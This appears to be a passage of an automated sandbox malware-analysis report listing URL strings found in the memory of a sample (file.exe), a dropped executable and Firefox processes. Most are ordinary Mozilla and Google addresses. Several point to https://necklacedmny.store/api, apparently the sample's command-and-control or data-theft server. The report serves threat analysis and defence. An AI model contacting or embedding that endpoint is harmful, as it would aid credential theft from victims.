Source: file.exe, 00000000.00000003.2173560257.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174004545.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174156627.00000000052D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/Y
Source: file.exe, 00000000.00000003.2173560257.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174004545.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174156627.00000000052D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/a
Source: file.exe, file.exe, 00000000.00000003.2173921284.00000000052DE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336153066.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221874778.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222056225.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336173364.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2232690229.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2173836992.00000000052DA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221899920.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2158727601.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2232447339.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221768283.0000000000A69000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, efe6fe4127.exe, 00000009.00000003.2713594540.00000000056D7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2834293641.0000000000B6A000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2697164287.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2698088537.00000000056D7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2697928533.00000000056D2000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2832811721.00000000056D2000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2648446108.0000000000B75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2336173364.0000000000A69000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api8f
Source: efe6fe4127.exe, 00000009.00000003.2832811721.00000000056D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiA
Source: efe6fe4127.exe, 00000009.00000003.2713594540.00000000056D7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2697164287.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2698088537.00000000056D7000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2697928533.00000000056D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiu
Source: efe6fe4127.exe, 00000009.00000003.2725411254.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2832811721.00000000056D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/apiw
Source: efe6fe4127.exe, 00000009.00000003.2725411254.00000000056D5000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2832811721.00000000056D2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/api~
Source: efe6fe4127.exe, 00000009.00000003.2693852054.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/bW
Source: efe6fe4127.exe, 00000009.00000003.2834778885.0000000000B82000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2831918485.0000000000B76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/mYgo3iF
Source: efe6fe4127.exe, 0000000C.00000003.2836024588.0000000001A56000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2871436723.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2839354396.0000000001A59000.00000004.00000020.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2822426933.0000000001A56000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/o
Source: file.exe, 00000000.00000003.2336454706.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2336129230.0000000000A75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/s
Source: file.exe, 00000000.00000003.2173560257.00000000052D0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174004545.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2174156627.00000000052D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store/y
Source: file.exe, 00000000.00000003.2336374803.00000000009EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://necklacedmny.store:443/api
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userABOUT_SPONSORED_TOP_SITES
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userABOUT_SPONSORED_TOP_SITEStopsites
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-user-removal
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A15000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpresource://devtools/
Source: firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: efe6fe4127.exe, 0000000C.00000003.2849392911.00000000064E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000002E.00000003.2981512771.0000020F2FD38000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://svgwg.org/svg2-draft/struct.html#SymbolNotes:
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000002E.00000003.2995577212.0000020F30A5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2993870594.0000020F30A5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tools.ietf.org/html/draft-west-first-party-cookies).
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: file.exe, 00000000.00000003.2193594882.00000000052D4000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693716552.00000000056ED000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2693541904.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2932128135.00000121573CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2932095953.0000029B41CC7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000002E.00000003.3019945426.0000020F30AEF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.certificate-transparency.org/what-is-ct
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000002E.00000003.3053296794.0000020F385DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3057332282.0000020F38638000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3057057500.0000020F38627000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056553256.0000020F30A1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.2159437631.000000000530A000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649907630.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649658911.0000000005721000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2649533430.0000000005724000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798475825.00000000061FA000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2798265490.00000000062C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001A.00000003.2835306772.0000025E42431000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2833374978.0000025E4240F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2836337904.0000025E42452000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2832408126.0000025E42200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.3056466204.0000020F30A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000002E.00000003.3056466204.0000020F30A8A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search#didSettingsMetaDataUpdate
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: file.exe, 00000000.00000003.2193511222.000000000530D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2680343152.0000000005725000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 0000000C.00000003.2846546783.00000000061EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2193511222.000000000530D000.00000004.00000800.00020000.00000000.sdmp, efe6fe4127.exe, 00000009.00000003.2680343152.0000000005725000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001C.00000002.2937015583.00000121574A0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2931215324.0000029B41AA0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
